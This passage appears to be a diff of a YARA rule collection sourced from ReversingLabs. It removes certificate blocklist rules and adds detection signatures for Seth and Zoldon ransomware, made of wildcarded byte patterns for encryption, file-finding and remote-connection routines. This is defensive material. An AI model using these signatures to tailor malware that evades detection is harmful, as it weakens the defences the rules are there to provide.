+            D0 66 C7 00 ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
+            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 89 55
+            ?? 83 7D ?? ?? 7F ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 77 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
+            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24
+            ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 45 ?? ?? ?? ?? ?? DF 6D ??
+            DD 5D ?? DD 45 ?? DD 05 ?? ?? ?? ?? DF E9 DD D8 76 ?? 8B 45 ?? 89 45 ?? EB ?? C7 45
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
+        }
+		$encrypt_files_p2 = {
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF
+            D0 C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 15 ??
+            ?? ?? ?? A1 ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? C7 04 24 ??
+            ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ??
+            ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 04 24 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? FF D0 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04
+            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
+            45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44
+            24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45
+        }
+		$encrypt_files_p3 = {
+            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
+            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 39 55 ?? 7F ?? 39 55 ?? 7C ?? 39
+            45 ?? 77 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ??
+            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 8B 55 ??
+            89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 29 45 ??
+            19 55 ?? 83 7D ?? ?? 0F 8F ?? ?? ?? ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 0F 87 ?? ?? ??
+            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ??
+            ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
+        }
+		$find_files_p1 = {
+            55 89 E5 57 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24
+            ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24
+            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44
+            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ??
+            89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 D0 C7 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F
+            84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F B6 95 ?? ?? ??
+            ?? 0F B6 05 ?? ?? ?? ?? 0F B6 D2 0F B6 C0 29 C2 89 D0 85 C0 0F 84 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ??
+            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
+            E0 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ??
+            ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
+        }
+		$find_files_p2 = {
+            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
+            89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D
+            50 ?? 8B 45 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ??
+            C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0
+        }
+		$find_files_p3 = {
+            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04
+            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83
+            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B
+            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44
+            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24
+            ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 EB
+            ?? 90 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
+            85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
+            04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" or pe.signatures [ i ] . serial == "87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" ) and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0860C8A7Ed18C3F030A32722Fd2B220C : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Seth : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Seth ransomware."
 		author = "ReversingLabs"
-		id = "335a1cd3-520a-5f0f-abda-6ec8a122de4b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "001de900-4556-5428-a243-7ec07a7ed05e"
+		date = "2021-04-02"
+		modified = "2021-04-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1582-L1598"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3c777fb157a6669bfdf3143e77f69265e09458a2b42b75b72680eb043da71e85"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.Seth.yara#L1-L122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "72a9d902eea2381f40d42faa7f1686c4ca54d364af0cbd8711697bbc1a235646"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Seth"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Tony Yeh" and pe.signatures [ i ] . serial == "08:60:c8:a7:ed:18:c3:f0:30:a3:27:22:fd:2b:22:0c" and 1404172799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_2Fdadd0740572270203F8138692C4A83 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "0b289c4e-c564-5513-a1a5-42e8551c6218"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1600-L1616"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "18ce7ed721a454c5bb3cd6ab26df703b1e08b94b8c518055feffa38ad42afa50"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 85 ??
+            ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+            89 C1 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 48 8B 95 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 0D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48
+            8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89
+            C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 48 8B 85
+        }
+		$encrypt_files_p2 = {
+            48 89 C2 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 8B 85
+            ?? ?? ?? ?? 89 C2 E8 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
+            63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
+            8B 95 ?? ?? ?? ?? 48 8D 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 48 63 C8 48 8B 95 ?? ?? ?? ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83
+            BD ?? ?? ?? ?? ?? 74 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
+            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ??
+            ?? 5B 5D C3
+        }
+		$remote_connection_p1 = {
+            55 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8B 05 ?? ??
+            ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 85 ?? ??
+            ?? ?? 41 89 D0 48 89 C2 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 05 ??
+            ?? ?? ?? FF D0 89 C1 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA
+            C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ?? ?? 29 C1 89 C8 8D 88 ?? ?? ?? ??
+            48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 48
+            8B 05 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
+            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 95 ?? ?? ??
+            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 48
+            8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
+            ?? 8B 8D ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 41 89 C8 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B8
+            ?? ?? ?? ?? 44 8D 40 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
+            ?? 49 89 C9 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 85 C0
+        }
+		$remote_connection_p2 = {
+            74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
+            ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48
+            8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1
+            48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1
+            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
+            48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ??
+            ?? ?? ?? FF D0 0F B6 85 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 C1 BA ?? ?? ?? ?? 89 C8 F7 EA C1 FA ?? 89 C8 C1 F8 ?? 29 C2 89 D0 69 C0 ?? ?? ??
+            ?? 29 C1 89 C8 8D 88 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 41 89 C9 49 89 D0
+            48 8D 15 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 C7 44 24 ??
+            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 C0 48 8B 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15
+            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 48 8B
+            05 ?? ?? ?? ?? FF D0 B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5D C3
+        }
+		$find_files = {
+            48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 F8 ?? 0F 95 C0 84 C0 74 ?? BB ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ??
+            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C2 48 8B 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ??
+            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ??
+            ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 10 48 83 EA ?? 48 8B 12
+            48 01 D0 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 0F 95 C0 84 C0 0F 85 ?? ?? ?? ?? 48 8B 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB ?? ?? ?? ?? 48
+            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? BB ?? ?? ?? ?? EB ?? 90 BB
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 83 FB ?? 74 ?? E9 ?? ?? ?? ?? 90 E9
+            ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ??
+            ?? 48 89 C1 E8 ?? ?? ?? ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, William Zoltan" and pe.signatures [ i ] . serial == "2f:da:dd:07:40:57:22:70:20:3f:81:38:69:2c:4a:83" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Fc13D6220C629043A26F81B1Cad72D8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zoldon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Zoldon ransomware."
 		author = "ReversingLabs"
-		id = "c2573adc-6580-58aa-a58c-c21bf6b79364"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "5d28e6f0-9d6b-54f4-81ed-aadb58352c80"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1618-L1634"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5572c278f6c9be62b2bba09ea610fd170438c6893ee5283ff4a5b3bb2852b07b"
